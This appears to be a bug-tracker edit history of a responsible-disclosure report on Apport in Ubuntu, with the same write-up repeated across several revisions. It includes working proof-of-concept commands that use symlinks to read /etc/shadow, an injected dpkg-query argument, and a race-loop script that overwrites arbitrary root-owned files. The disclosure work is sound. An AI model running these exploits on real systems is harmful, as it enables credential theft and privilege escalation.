2021-03-05 15:54:22 |
mal |
bug |
|
|
added bug |
2021-03-05 16:07:29 |
mal |
description |
# Vulnerabilities in Apport
During a cursory code review, several potential security issues in `apport` and
crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have been
identified.
While the issue regarding the `openjdk-14-lts` package is exploitable
on default installations, the remaining issues most likely are mitigated by
the sysctl setting `fs.protected_symlinks` on default Ubuntu installations.
With regard to issues mitigated by `fs.protected_symlinks`, it is not clear if
they are considered to be part of the threat model, but nonetheless will be
included in this report. Further, if the issues regarding package hooks should
be reported in the corresponding packages' bug tracker, please let me know.
## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py (Medium)
The `add_info()` function allows for a directory traversal by building a file
path using user-controlled data without properly sanitizing the resulting path.
```Python
def add_info(report, ui=None):
if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:
# attach hs_err_<pid>.pid file
cwd = report['ProcCwd']
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
pid = pid_line.groups()[0]
path = "%s/hs_err_pid%s.log" % (cwd, pid)
# make sure if exists
if os.path.exists(path):
content = read_file(path)
# truncate if bigger than 100 KB
# see LP: #1696814
max_length = 100*1024
if sys.getsizeof(content) < max_length:
report['HotspotError'] = content
report['Tags'] += ' openjdk-hs-err'
else:
report['HotspotError'] = content[:max_length] + \
"\n[truncated by openjdk-11 apport hook]" + \
"\n[max log size is %s, file size was %s]" % \
(si_units(max_length), si_units(sys.getsizeof(content)))
report['Tags'] += ' openjdk-hs-err'
```
By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as `0`, the
function includes an arbitrary file by following a potential symbolic link
`/home/user/hs_err_pid0.log`.
### PoC
```
$ sudo apt install openjdk-14-jdk
$ sudo sysctl fs.protected_symlinks
fs.protected_symlinks = 1
$ ln -s /etc/shadow /home/user/hs_err_pid0.log
$ pid=$'\t0';cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: openjdk-lts 123
SourcePackage: openjdk-lts
ProcCwd: /home/user
ProcStatus:
Pid:$pid
Uid:$pid
EOF
$ grep -A3 root: /var/crash/poc.crash
root:!:18393:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
```
## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info)
The root cause of this issue stems from the fact, that a potentially
user-controlled file in the `/tmp` directory is not checked for being a symbolic
link and therefore might allow including arbitrary files in the processed
crash report:
Note: Requires `fs.protected_symlinks=0`
```Python
def attach_3d_info(report, ui=None):
...
# Compiz internal state if compiz crashed
if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus" in report:
compiz_pid = 0
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
compiz_pid = pid_line.groups()[0]
compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid
attach_file_if_exists(report, compiz_state_file, "compiz_internal_states")
```
### PoC
```
$ sudo sysctl fs.protected_symlinks=0
fs.protected_symlinks = 0
$ ln -s /etc/shadow /tmp/compiz_internal_state0
$ cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: source_xorg 123
SourcePackage: compiz
ProcStatus:
Pid:
EOF
$ grep -A3 compiz_internal poc.crash
compiz_internal_states:
root:!:18686:0:99999:7:::
daemon:*:18474:0:99999:7:::
bin:*:18474:0:99999:7:::
```
## Issue 3: Spoof modified configuration files via argument injection (Info)
The `get_modified_conffiles()` function allows to spoof modified configuration
files by a controlled package name:
```Python
def get_modified_conffiles(self, package):
...
dpkg = subprocess.Popen(['dpkg-query', '-W', '--showformat=${Conffiles}',
package], stdout=subprocess.PIPE)
```
By supplying a `package` name such as `--showformat='${Conffiles;6}shadow 1\n'`
it is possible to manipulate dpkg-query's output and therefore to include the
`shadow` file in the resulting crash report.
Please note however that this function is seemingly only called
in the `attach_conffiles()` function, which subsequently requires a UI response
of the user to finally include the file in the crash report.
### PoC
```
$ dpkg-query -W --showformat='${Conffiles}' --showformat='${Conffiles;6}shadow 1\n' | head -n2
/etc/shadow 1
shadow 1
```
## Issue 4: Arbitrary file write in whoopsie-upload-all (Info)
After adding additional information to the crash file, `whoopsie-upload-all`
does not check if the crash file was replaced by a symbolic link before
writing the extended report back into the file. Thus, replacing the crash
file with a symbolic link allows to write into arbitrary files using
`whoopsie-upload-all`'s elevated privileges. By using a program's lax
configuration parsing (e.g. `logrotate`), this might lead to code execution.
Note: Requires `fs.protected_symlinks=0`
```Python
def process_report(report):
'''Collect information for a report and mark for whoopsie upload
...
# write updated report, we use os.open and os.fdopen as
# /proc/sys/fs/protected_regular is set to 1 (LP: #1848064)
fd = os.open(report, os.O_WRONLY | os.O_APPEND)
with os.fdopen(fd, 'wb') as f:
os.chmod(report, 0)
r.write(f, only_new=True)
os.chmod(report, 0o640)
```
### PoC
```
$ sudo sysctl fs.protected_symlinks
fs.protected_symlinks = 0
$ cat ex.sh
TARGET="/JRN"
while :; do
FN="/var/crash/$RANDOM.poc.crash"
pid=$'\t0';cat << EOF > $FN
ProblemType: Crash
ExecutablePath: /poc
Package: openjdk-lts 123
SourcePackage: openjdk-lts
ProcCwd: /home/user
ProcStatus:
Pid:$pid
Uid:$pid
EOF
while :; do
if ps aux|grep -q "[w]hoopsie-upload-all";then break; fi
done
sleep 0.3
rm -f $FN
ln -s $TARGET $FN
if [ -s /JRN ]; then echo DONE.; break; fi
done
$ sudo touch /JRN; ls -l /JRN # simulating file in e.g. /etc/logrotate.d/
-rw-r--r-- 1 root root 0 M�r 3 14:15 /JRN
$ bash ex.sh
DONE.
$ ls -l /JRN; sudo head -n3 /JRN
-rw-r----- 1 root root 105028 M�r 3 14:16 /JRN
ApportVersion: 2.20.11-0ubuntu27.16
Architecture: amd64
CasperMD5CheckResult: skip
```
# Credits
Please credit maik@secfault-security.com (@fktio) if the issues are considered
valid. Further, please coordinate the patch release date with us, in case we
consider publishing a short article about these issues.
Best regard,
maik |
# Vulnerabilities in Apport
During a cursory code review, several potential security issues in `apport` and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have been identified.
While the issue regarding the `openjdk-14-lts` package is exploitable
on default installations, the remaining issues most likely are mitigated by the sysctl setting `fs.protected_symlinks` on default Ubuntu installations.
With regard to issues mitigated by `fs.protected_symlinks`, it is not clear if they are considered to be part of the threat model, but nonetheless will be included in this report. Further, if the issues regarding package hooks should be reported in the corresponding packages' bug tracker, please let me know.
## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py
The `add_info()` function allows for a directory traversal by building a file path using user-controlled data without properly sanitizing the resulting path.
```Python
def add_info(report, ui=None):
if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:
# attach hs_err_<pid>.pid file
cwd = report['ProcCwd']
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
pid = pid_line.groups()[0]
path = "%s/hs_err_pid%s.log" % (cwd, pid)
# make sure if exists
if os.path.exists(path):
content = read_file(path)
# truncate if bigger than 100 KB
# see LP: #1696814
max_length = 100*1024
if sys.getsizeof(content) < max_length:
report['HotspotError'] = content
report['Tags'] += ' openjdk-hs-err'
else:
report['HotspotError'] = content[:max_length] + \
"\n[truncated by openjdk-11 apport hook]" + \
"\n[max log size is %s, file size was %s]" % \
(si_units(max_length), si_units(sys.getsizeof(content)))
report['Tags'] += ' openjdk-hs-err'
```
By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as `0`, the function includes an arbitrary file by following a potential symbolic link `/home/user/hs_err_pid0.log`.
### PoC
```
$ sudo apt install openjdk-14-jdk
$ sudo sysctl fs.protected_symlinks
fs.protected_symlinks = 1
$ ln -s /etc/shadow /home/user/hs_err_pid0.log
$ pid=$'\t0';cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: openjdk-lts 123
SourcePackage: openjdk-lts
ProcCwd: /home/user
ProcStatus:
Pid:$pid
Uid:$pid
EOF
$ grep -A3 root: /var/crash/poc.crash
root:!:18393:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
```
## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info)
The root cause of this issue stems from the fact, that a potentially
user-controlled file in the `/tmp` directory is not checked for being a symbolic link and therefore might allow including arbitrary files in the processed crash report:
Note: Requires `fs.protected_symlinks=0`
```Python
def attach_3d_info(report, ui=None):
...
# Compiz internal state if compiz crashed
if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus" in report:
compiz_pid = 0
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
compiz_pid = pid_line.groups()[0]
compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid
attach_file_if_exists(report, compiz_state_file, "compiz_internal_states")
```
### PoC
```
$ sudo sysctl fs.protected_symlinks=0
fs.protected_symlinks = 0
$ ln -s /etc/shadow /tmp/compiz_internal_state0
$ cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: source_xorg 123
SourcePackage: compiz
ProcStatus:
Pid:
EOF
$ grep -A3 compiz_internal poc.crash
compiz_internal_states:
root:!:18686:0:99999:7:::
daemon:*:18474:0:99999:7:::
bin:*:18474:0:99999:7:::
```
## Issue 3: Spoof modified configuration files via argument injection (Info)
The `get_modified_conffiles()` function allows to spoof modified configuration files by a controlled package name:
```Python
def get_modified_conffiles(self, package):
...
dpkg = subprocess.Popen(['dpkg-query', '-W', '--showformat=${Conffiles}',
package], stdout=subprocess.PIPE)
```
By supplying a `package` name such as
`--showformat='${Conffiles;6}shadow 1\n'` it is possible to manipulate dpkg-query's output and therefore to include the `shadow` file in the resulting crash report.
Please note however that this function is seemingly only called in the `attach_conffiles()` function, which subsequently requires a UI response
of the user to finally include the file in the crash report.
### PoC
```
$ dpkg-query -W --showformat='${Conffiles}' --showformat='${Conffiles;6}shadow 1\n' | head -n2
/etc/shadow 1
shadow 1
```
## Issue 4: Arbitrary file write in whoopsie-upload-all (Info)
After adding additional information to the crash file, `whoopsie-upload-all` does not check if the crash file was replaced by a symbolic link before writing the extended report back into the file. Thus, replacing the crash file with a symbolic link allows to write into arbitrary files using `whoopsie-upload-all`'s elevated privileges. By using a program's lax configuration parsing (e.g. `logrotate`), this might lead to code execution.
Note: Requires `fs.protected_symlinks=0`
```Python
def process_report(report):
'''Collect information for a report and mark for whoopsie upload
...
# write updated report, we use os.open and os.fdopen as
# /proc/sys/fs/protected_regular is set to 1 (LP: #1848064)
fd = os.open(report, os.O_WRONLY | os.O_APPEND)
with os.fdopen(fd, 'wb') as f:
os.chmod(report, 0)
r.write(f, only_new=True)
os.chmod(report, 0o640)
```
### PoC
```
$ sudo sysctl fs.protected_symlinks
fs.protected_symlinks = 0
$ cat ex.sh
TARGET="/JRN"
while :; do
FN="/var/crash/$RANDOM.poc.crash"
pid=$'\t0';cat << EOF > $FN
ProblemType: Crash
ExecutablePath: /poc
Package: openjdk-lts 123
SourcePackage: openjdk-lts
ProcCwd: /home/user
ProcStatus:
Pid:$pid
Uid:$pid
EOF
while :; do
if ps aux|grep -q "[w]hoopsie-upload-all";then break; fi
done
sleep 0.3
rm -f $FN
ln -s $TARGET $FN
if [ -s /JRN ]; then echo DONE.; break; fi
done
$ sudo touch /JRN; ls -l /JRN # simulating file in e.g. /etc/logrotate.d/
-rw-r--r-- 1 root root 0 M�r 3 14:15 /JRN
$ bash ex.sh
DONE.
$ ls -l /JRN; sudo head -n3 /JRN
-rw-r----- 1 root root 105028 M�r 3 14:16 /JRN
ApportVersion: 2.20.11-0ubuntu27.16
Architecture: amd64
CasperMD5CheckResult: skip
```
# Credits
Please credit maik@secfault-security.com (@fktio) if the issues are considered valid. Further, please coordinate the patch release date with us, in case we consider publishing a short article about these issues.
Best regard,
maik |
|
2021-03-05 16:08:21 |
mal |
description |
# Vulnerabilities in Apport
During a cursory code review, several potential security issues in `apport` and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have been identified.
While the issue regarding the `openjdk-14-lts` package is exploitable
on default installations, the remaining issues most likely are mitigated by the sysctl setting `fs.protected_symlinks` on default Ubuntu installations.
With regard to issues mitigated by `fs.protected_symlinks`, it is not clear if they are considered to be part of the threat model, but nonetheless will be included in this report. Further, if the issues regarding package hooks should be reported in the corresponding packages' bug tracker, please let me know.
## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py
The `add_info()` function allows for a directory traversal by building a file path using user-controlled data without properly sanitizing the resulting path.
```Python
def add_info(report, ui=None):
if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:
# attach hs_err_<pid>.pid file
cwd = report['ProcCwd']
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
pid = pid_line.groups()[0]
path = "%s/hs_err_pid%s.log" % (cwd, pid)
# make sure if exists
if os.path.exists(path):
content = read_file(path)
# truncate if bigger than 100 KB
# see LP: #1696814
max_length = 100*1024
if sys.getsizeof(content) < max_length:
report['HotspotError'] = content
report['Tags'] += ' openjdk-hs-err'
else:
report['HotspotError'] = content[:max_length] + \
"\n[truncated by openjdk-11 apport hook]" + \
"\n[max log size is %s, file size was %s]" % \
(si_units(max_length), si_units(sys.getsizeof(content)))
report['Tags'] += ' openjdk-hs-err'
```
By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as `0`, the function includes an arbitrary file by following a potential symbolic link `/home/user/hs_err_pid0.log`.
### PoC
```
$ sudo apt install openjdk-14-jdk
$ sudo sysctl fs.protected_symlinks
fs.protected_symlinks = 1
$ ln -s /etc/shadow /home/user/hs_err_pid0.log
$ pid=$'\t0';cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: openjdk-lts 123
SourcePackage: openjdk-lts
ProcCwd: /home/user
ProcStatus:
Pid:$pid
Uid:$pid
EOF
$ grep -A3 root: /var/crash/poc.crash
root:!:18393:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
```
## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info)
The root cause of this issue stems from the fact, that a potentially
user-controlled file in the `/tmp` directory is not checked for being a symbolic link and therefore might allow including arbitrary files in the processed crash report:
Note: Requires `fs.protected_symlinks=0`
```Python
def attach_3d_info(report, ui=None):
...
# Compiz internal state if compiz crashed
if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus" in report:
compiz_pid = 0
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
compiz_pid = pid_line.groups()[0]
compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid
attach_file_if_exists(report, compiz_state_file, "compiz_internal_states")
```
### PoC
```
$ sudo sysctl fs.protected_symlinks=0
fs.protected_symlinks = 0
$ ln -s /etc/shadow /tmp/compiz_internal_state0
$ cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: source_xorg 123
SourcePackage: compiz
ProcStatus:
Pid:
EOF
$ grep -A3 compiz_internal poc.crash
compiz_internal_states:
root:!:18686:0:99999:7:::
daemon:*:18474:0:99999:7:::
bin:*:18474:0:99999:7:::
```
## Issue 3: Spoof modified configuration files via argument injection (Info)
The `get_modified_conffiles()` function allows to spoof modified configuration files by a controlled package name:
```Python
def get_modified_conffiles(self, package):
...
dpkg = subprocess.Popen(['dpkg-query', '-W', '--showformat=${Conffiles}',
package], stdout=subprocess.PIPE)
```
By supplying a `package` name such as
`--showformat='${Conffiles;6}shadow 1\n'` it is possible to manipulate dpkg-query's output and therefore to include the `shadow` file in the resulting crash report.
Please note however that this function is seemingly only called in the `attach_conffiles()` function, which subsequently requires a UI response
of the user to finally include the file in the crash report.
### PoC
```
$ dpkg-query -W --showformat='${Conffiles}' --showformat='${Conffiles;6}shadow 1\n' | head -n2
/etc/shadow 1
shadow 1
```
## Issue 4: Arbitrary file write in whoopsie-upload-all (Info)
After adding additional information to the crash file, `whoopsie-upload-all` does not check if the crash file was replaced by a symbolic link before writing the extended report back into the file. Thus, replacing the crash file with a symbolic link allows to write into arbitrary files using `whoopsie-upload-all`'s elevated privileges. By using a program's lax configuration parsing (e.g. `logrotate`), this might lead to code execution.
Note: Requires `fs.protected_symlinks=0`
```Python
def process_report(report):
'''Collect information for a report and mark for whoopsie upload
...
# write updated report, we use os.open and os.fdopen as
# /proc/sys/fs/protected_regular is set to 1 (LP: #1848064)
fd = os.open(report, os.O_WRONLY | os.O_APPEND)
with os.fdopen(fd, 'wb') as f:
os.chmod(report, 0)
r.write(f, only_new=True)
os.chmod(report, 0o640)
```
### PoC
```
$ sudo sysctl fs.protected_symlinks
fs.protected_symlinks = 0
$ cat ex.sh
TARGET="/JRN"
while :; do
FN="/var/crash/$RANDOM.poc.crash"
pid=$'\t0';cat << EOF > $FN
ProblemType: Crash
ExecutablePath: /poc
Package: openjdk-lts 123
SourcePackage: openjdk-lts
ProcCwd: /home/user
ProcStatus:
Pid:$pid
Uid:$pid
EOF
while :; do
if ps aux|grep -q "[w]hoopsie-upload-all";then break; fi
done
sleep 0.3
rm -f $FN
ln -s $TARGET $FN
if [ -s /JRN ]; then echo DONE.; break; fi
done
$ sudo touch /JRN; ls -l /JRN # simulating file in e.g. /etc/logrotate.d/
-rw-r--r-- 1 root root 0 M�r 3 14:15 /JRN
$ bash ex.sh
DONE.
$ ls -l /JRN; sudo head -n3 /JRN
-rw-r----- 1 root root 105028 M�r 3 14:16 /JRN
ApportVersion: 2.20.11-0ubuntu27.16
Architecture: amd64
CasperMD5CheckResult: skip
```
# Credits
Please credit maik@secfault-security.com (@fktio) if the issues are considered valid. Further, please coordinate the patch release date with us, in case we consider publishing a short article about these issues.
Best regard,
maik |
# Vulnerabilities in Apport
During a cursory code review, several potential security issues in `apport` and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have been identified.
While the issue regarding the `openjdk-14-lts` package is exploitable
on default installations, the remaining issues most likely are mitigated by the sysctl setting `fs.protected_symlinks` on default Ubuntu installations.
With regard to issues mitigated by `fs.protected_symlinks`, it is not clear if they are considered to be part of the threat model, but nonetheless will be included in this report. Further, if the issues regarding package hooks should be reported in the corresponding packages' bug tracker, please let me know.
## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py
The `add_info()` function allows for a directory traversal by building a file path using user-controlled data without properly sanitizing the resulting path.
```Python
def add_info(report, ui=None):
if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:
# attach hs_err_<pid>.pid file
cwd = report['ProcCwd']
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
pid = pid_line.groups()[0]
path = "%s/hs_err_pid%s.log" % (cwd, pid)
# make sure if exists
if os.path.exists(path):
content = read_file(path)
# truncate if bigger than 100 KB
# see LP: #1696814
max_length = 100*1024
if sys.getsizeof(content) < max_length:
report['HotspotError'] = content
report['Tags'] += ' openjdk-hs-err'
else:
report['HotspotError'] = content[:max_length] + \
"\n[truncated by openjdk-11 apport hook]" + \
"\n[max log size is %s, file size was %s]" % \
(si_units(max_length), si_units(sys.getsizeof(content)))
report['Tags'] += ' openjdk-hs-err'
```
By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as `0`, the function includes an arbitrary file by following a potential symbolic link `/home/user/hs_err_pid0.log`.
### PoC
```
$ sudo apt install openjdk-14-jdk
$ sudo sysctl fs.protected_symlinks
fs.protected_symlinks = 1
$ ln -s /etc/shadow /home/user/hs_err_pid0.log
$ pid=$'\t0';cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: openjdk-lts 123
SourcePackage: openjdk-lts
ProcCwd: /home/user
ProcStatus:
Pid:$pid
Uid:$pid
EOF
$ grep -A3 root: /var/crash/poc.crash
root:!:18393:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
```
## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info)
The root cause of this issue stems from the fact, that a potentially
user-controlled file in the `/tmp` directory is not checked for being a symbolic link and therefore might allow including arbitrary files in the processed crash report:
Note: Requires `fs.protected_symlinks=0`
```Python
def attach_3d_info(report, ui=None):
...
# Compiz internal state if compiz crashed
if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus" in report:
compiz_pid = 0
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
compiz_pid = pid_line.groups()[0]
compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid
attach_file_if_exists(report, compiz_state_file, "compiz_internal_states")
```
### PoC
```
$ sudo sysctl fs.protected_symlinks=0
fs.protected_symlinks = 0
$ ln -s /etc/shadow /tmp/compiz_internal_state0
$ cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: source_xorg 123
SourcePackage: compiz
ProcStatus:
Pid:
EOF
$ grep -A3 compiz_internal poc.crash
compiz_internal_states:
root:!:18686:0:99999:7:::
daemon:*:18474:0:99999:7:::
bin:*:18474:0:99999:7:::
```
## Issue 3: Spoof modified config files via argument injection (Info)
The `get_modified_conffiles()` function allows to spoof modified configuration files by a controlled package name:
```Python
def get_modified_conffiles(self, package):
...
dpkg = subprocess.Popen(['dpkg-query', '-W', '--showformat=${Conffiles}',
package], stdout=subprocess.PIPE)
```
By supplying a `package` name such as
`--showformat='${Conffiles;6}shadow 1\n'` it is possible to manipulate dpkg-query's output and therefore to include the `shadow` file in the resulting crash report.
Please note however that this function is seemingly only called in the `attach_conffiles()` function, which subsequently requires a UI response
of the user to finally include the file in the crash report.
### PoC
```
$ dpkg-query -W --showformat='${Conffiles}' --showformat='${Conffiles;6}shadow 1\n' | head -n2
/etc/shadow 1
shadow 1
```
## Issue 4: Arbitrary file write in whoopsie-upload-all (Info)
After adding additional information to the crash file, `whoopsie-upload-all` does not check if the crash file was replaced by a symbolic link before writing the extended report back into the file. Thus, replacing the crash file with a symbolic link allows to write into arbitrary files using `whoopsie-upload-all`'s elevated privileges. By using a program's lax configuration parsing (e.g. `logrotate`), this might lead to code execution.
Note: Requires `fs.protected_symlinks=0`
```Python
def process_report(report):
'''Collect information for a report and mark for whoopsie upload
...
# write updated report, we use os.open and os.fdopen as
# /proc/sys/fs/protected_regular is set to 1 (LP: #1848064)
fd = os.open(report, os.O_WRONLY | os.O_APPEND)
with os.fdopen(fd, 'wb') as f:
os.chmod(report, 0)
r.write(f, only_new=True)
os.chmod(report, 0o640)
```
### PoC
```
$ sudo sysctl fs.protected_symlinks
fs.protected_symlinks = 0
$ cat ex.sh
TARGET="/JRN"
while :; do
FN="/var/crash/$RANDOM.poc.crash"
pid=$'\t0';cat << EOF > $FN
ProblemType: Crash
ExecutablePath: /poc
Package: openjdk-lts 123
SourcePackage: openjdk-lts
ProcCwd: /home/user
ProcStatus:
Pid:$pid
Uid:$pid
EOF
while :; do
if ps aux|grep -q "[w]hoopsie-upload-all";then break; fi
done
sleep 0.3
rm -f $FN
ln -s $TARGET $FN
if [ -s /JRN ]; then echo DONE.; break; fi
done
$ sudo touch /JRN; ls -l /JRN # simulating file in e.g. /etc/logrotate.d/
-rw-r--r-- 1 root root 0 M�r 3 14:15 /JRN
$ bash ex.sh
DONE.
$ ls -l /JRN; sudo head -n3 /JRN
-rw-r----- 1 root root 105028 M�r 3 14:16 /JRN
ApportVersion: 2.20.11-0ubuntu27.16
Architecture: amd64
CasperMD5CheckResult: skip
```
# Credits
Please credit maik@secfault-security.com (@fktio) if the issues are considered valid. Further, please coordinate the patch release date with us, in case we consider publishing a short article about these issues.
Best regard,
maik |
|
2021-03-05 16:41:43 |
mal |
description |
# Vulnerabilities in Apport
During a cursory code review, several potential security issues in `apport` and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have been identified.
While the issue regarding the `openjdk-14-lts` package is exploitable
on default installations, the remaining issues most likely are mitigated by the sysctl setting `fs.protected_symlinks` on default Ubuntu installations.
With regard to issues mitigated by `fs.protected_symlinks`, it is not clear if they are considered to be part of the threat model, but nonetheless will be included in this report. Further, if the issues regarding package hooks should be reported in the corresponding packages' bug tracker, please let me know.
## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py
The `add_info()` function allows for a directory traversal by building a file path using user-controlled data without properly sanitizing the resulting path.
```Python
def add_info(report, ui=None):
if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:
# attach hs_err_<pid>.pid file
cwd = report['ProcCwd']
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
pid = pid_line.groups()[0]
path = "%s/hs_err_pid%s.log" % (cwd, pid)
# make sure if exists
if os.path.exists(path):
content = read_file(path)
# truncate if bigger than 100 KB
# see LP: #1696814
max_length = 100*1024
if sys.getsizeof(content) < max_length:
report['HotspotError'] = content
report['Tags'] += ' openjdk-hs-err'
else:
report['HotspotError'] = content[:max_length] + \
"\n[truncated by openjdk-11 apport hook]" + \
"\n[max log size is %s, file size was %s]" % \
(si_units(max_length), si_units(sys.getsizeof(content)))
report['Tags'] += ' openjdk-hs-err'
```
By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as `0`, the function includes an arbitrary file by following a potential symbolic link `/home/user/hs_err_pid0.log`.
### PoC
```
$ sudo apt install openjdk-14-jdk
$ sudo sysctl fs.protected_symlinks
fs.protected_symlinks = 1
$ ln -s /etc/shadow /home/user/hs_err_pid0.log
$ pid=$'\t0';cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: openjdk-lts 123
SourcePackage: openjdk-lts
ProcCwd: /home/user
ProcStatus:
Pid:$pid
Uid:$pid
EOF
$ grep -A3 root: /var/crash/poc.crash
root:!:18393:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
```
## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info)
The root cause of this issue stems from the fact, that a potentially
user-controlled file in the `/tmp` directory is not checked for being a symbolic link and therefore might allow including arbitrary files in the processed crash report:
Note: Requires `fs.protected_symlinks=0`
```Python
def attach_3d_info(report, ui=None):
...
# Compiz internal state if compiz crashed
if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus" in report:
compiz_pid = 0
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
compiz_pid = pid_line.groups()[0]
compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid
attach_file_if_exists(report, compiz_state_file, "compiz_internal_states")
```
### PoC
```
$ sudo sysctl fs.protected_symlinks=0
fs.protected_symlinks = 0
$ ln -s /etc/shadow /tmp/compiz_internal_state0
$ cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: source_xorg 123
SourcePackage: compiz
ProcStatus:
Pid:
EOF
$ grep -A3 compiz_internal poc.crash
compiz_internal_states:
root:!:18686:0:99999:7:::
daemon:*:18474:0:99999:7:::
bin:*:18474:0:99999:7:::
```
## Issue 3: Spoof modified config files via argument injection (Info)
The `get_modified_conffiles()` function allows to spoof modified configuration files by a controlled package name:
```Python
def get_modified_conffiles(self, package):
...
dpkg = subprocess.Popen(['dpkg-query', '-W', '--showformat=${Conffiles}',
package], stdout=subprocess.PIPE)
```
By supplying a `package` name such as
`--showformat='${Conffiles;6}shadow 1\n'` it is possible to manipulate dpkg-query's output and therefore to include the `shadow` file in the resulting crash report.
Please note however that this function is seemingly only called in the `attach_conffiles()` function, which subsequently requires a UI response
of the user to finally include the file in the crash report.
### PoC
```
$ dpkg-query -W --showformat='${Conffiles}' --showformat='${Conffiles;6}shadow 1\n' | head -n2
/etc/shadow 1
shadow 1
```
## Issue 4: Arbitrary file write in whoopsie-upload-all (Info)
After adding additional information to the crash file, `whoopsie-upload-all` does not check if the crash file was replaced by a symbolic link before writing the extended report back into the file. Thus, replacing the crash file with a symbolic link allows to write into arbitrary files using `whoopsie-upload-all`'s elevated privileges. By using a program's lax configuration parsing (e.g. `logrotate`), this might lead to code execution.
Note: Requires `fs.protected_symlinks=0`
```Python
def process_report(report):
'''Collect information for a report and mark for whoopsie upload
...
# write updated report, we use os.open and os.fdopen as
# /proc/sys/fs/protected_regular is set to 1 (LP: #1848064)
fd = os.open(report, os.O_WRONLY | os.O_APPEND)
with os.fdopen(fd, 'wb') as f:
os.chmod(report, 0)
r.write(f, only_new=True)
os.chmod(report, 0o640)
```
### PoC
```
$ sudo sysctl fs.protected_symlinks
fs.protected_symlinks = 0
$ cat ex.sh
TARGET="/JRN"
while :; do
FN="/var/crash/$RANDOM.poc.crash"
pid=$'\t0';cat << EOF > $FN
ProblemType: Crash
ExecutablePath: /poc
Package: openjdk-lts 123
SourcePackage: openjdk-lts
ProcCwd: /home/user
ProcStatus:
Pid:$pid
Uid:$pid
EOF
while :; do
if ps aux|grep -q "[w]hoopsie-upload-all";then break; fi
done
sleep 0.3
rm -f $FN
ln -s $TARGET $FN
if [ -s /JRN ]; then echo DONE.; break; fi
done
$ sudo touch /JRN; ls -l /JRN # simulating file in e.g. /etc/logrotate.d/
-rw-r--r-- 1 root root 0 M�r 3 14:15 /JRN
$ bash ex.sh
DONE.
$ ls -l /JRN; sudo head -n3 /JRN
-rw-r----- 1 root root 105028 M�r 3 14:16 /JRN
ApportVersion: 2.20.11-0ubuntu27.16
Architecture: amd64
CasperMD5CheckResult: skip
```
# Credits
Please credit maik@secfault-security.com (@fktio) if the issues are considered valid. Further, please coordinate the patch release date with us, in case we consider publishing a short article about these issues.
Best regard,
maik |
# Vulnerabilities in Apport
During a cursory code review, several potential security issues in `apport` and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have been identified.
While the issue regarding the `openjdk-14-lts` package is exploitable
